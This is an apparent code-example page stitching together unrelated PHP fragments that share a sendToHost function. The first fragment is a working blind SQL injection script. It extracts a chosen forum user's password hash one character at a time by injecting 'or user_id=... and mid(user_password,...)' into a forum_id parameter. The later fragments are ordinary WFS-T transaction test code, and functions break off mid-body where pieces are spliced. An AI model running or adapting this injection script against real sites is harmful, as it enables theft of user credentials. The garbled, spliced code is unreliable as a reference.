Пример #1
0
$checkchar[5] = "char(53)";
$checkchar[6] = "char(54)";
$checkchar[7] = "char(55)";
$checkchar[8] = "char(56)";
$checkchar[9] = "char(57)";
$checkchar[a] = "char(97)";
$checkchar[b] = "char(98)";
$checkchar[c] = "char(99)";
$checkchar[d] = "char(100)";
$checkchar[e] = "char(101)";
$checkchar[f] = "char(102)";
for ($i = 1; $i < 33; $i++) {
    reset($checkchar);
    while (list($i2, $i2val) = @each($checkchar)) {
        $vars = "forum_id=1+or+user_id={$the_userid_to_hack}+and+mid(user_password,{$i},1)={$checkchar[$i2]}/*";
        $data = sendToHost("{$server}", 'post', "{$script}", "{$vars}");
        if (eregi("{$data_to_match}", "{$data}")) {
            //echo("<b>$i2</b>");
        } else {
            echo "<br>{$i}= {$i2}";
            flush();
            break;
        }
    }
}
function sendToHost($host, $method, $path, $data, $useragent = 1)
{
    $method = strtoupper($method);
    $fp = fsockopen($host, 80);
    fputs($fp, "{$method} {$path} HTTP/1.1\n");
    fputs($fp, "Host: {$host}\n");
echo '<meta http-equiv="Content-Type" content="text/html; charset=' . CHARSET . '">';
?>
<title>Test WFS-T operated by CCGIS</title>
</head>
<?php 
if (isset($_REQUEST["filter"]) && $_REQUEST["filter"] != "" && $_REQUEST["onlineresource"] != '') {
    $arURL = parse_url($_REQUEST["onlineresource"]);
    $host = $arURL["host"];
    $port = $arURL["port"];
    if ($port == '') {
        $port = 80;
    }
    $path = $arURL["path"];
    $method = "POST";
    $data = stripslashes($_REQUEST["filter"]);
    $out = sendToHost($host, $port, $method, html_entity_decode($path), $data);
    echo "-------------------get-------------<br>";
    echo htmlentities($out);
    echo "-------------------end of get-------------<br>";
}
function sendToHost($host, $port, $method, $path, $data)
{
    echo "-------------------send-------------<br>";
    echo $host . "<br>" . $method . "<br>" . $path . "<br>" . htmlspecialchars($data) . "<br>";
    echo "-------------------end of send-------------<br>";
    $buf = '';
    if (empty($method)) {
        $method = 'POST';
    }
    $method = mb_strtoupper($method);
    $fp = fsockopen($host, $port);
/**
 * sends the data of WFS Transaction and echos the response
 * 
 *  @param string url to send the WFS Transaction to
 *  @param string WFS Transaction data
 */
function doTransaction($url, $data)
{
    $arURL = parse_url($url);
    $host = $arURL["host"];
    $port = $arURL["port"];
    if ($port == '') {
        $port = 80;
    }
    $path = $arURL["path"];
    $method = "POST";
    $result = sendToHost($host, $port, $method, html_entity_decode($path), $data);
    //delete header from result
    $result = mb_eregi_replace("^[^<]*", "", $result);
    $result = mb_eregi_replace("[^>]*\$", "", $result);
    echo $result;
}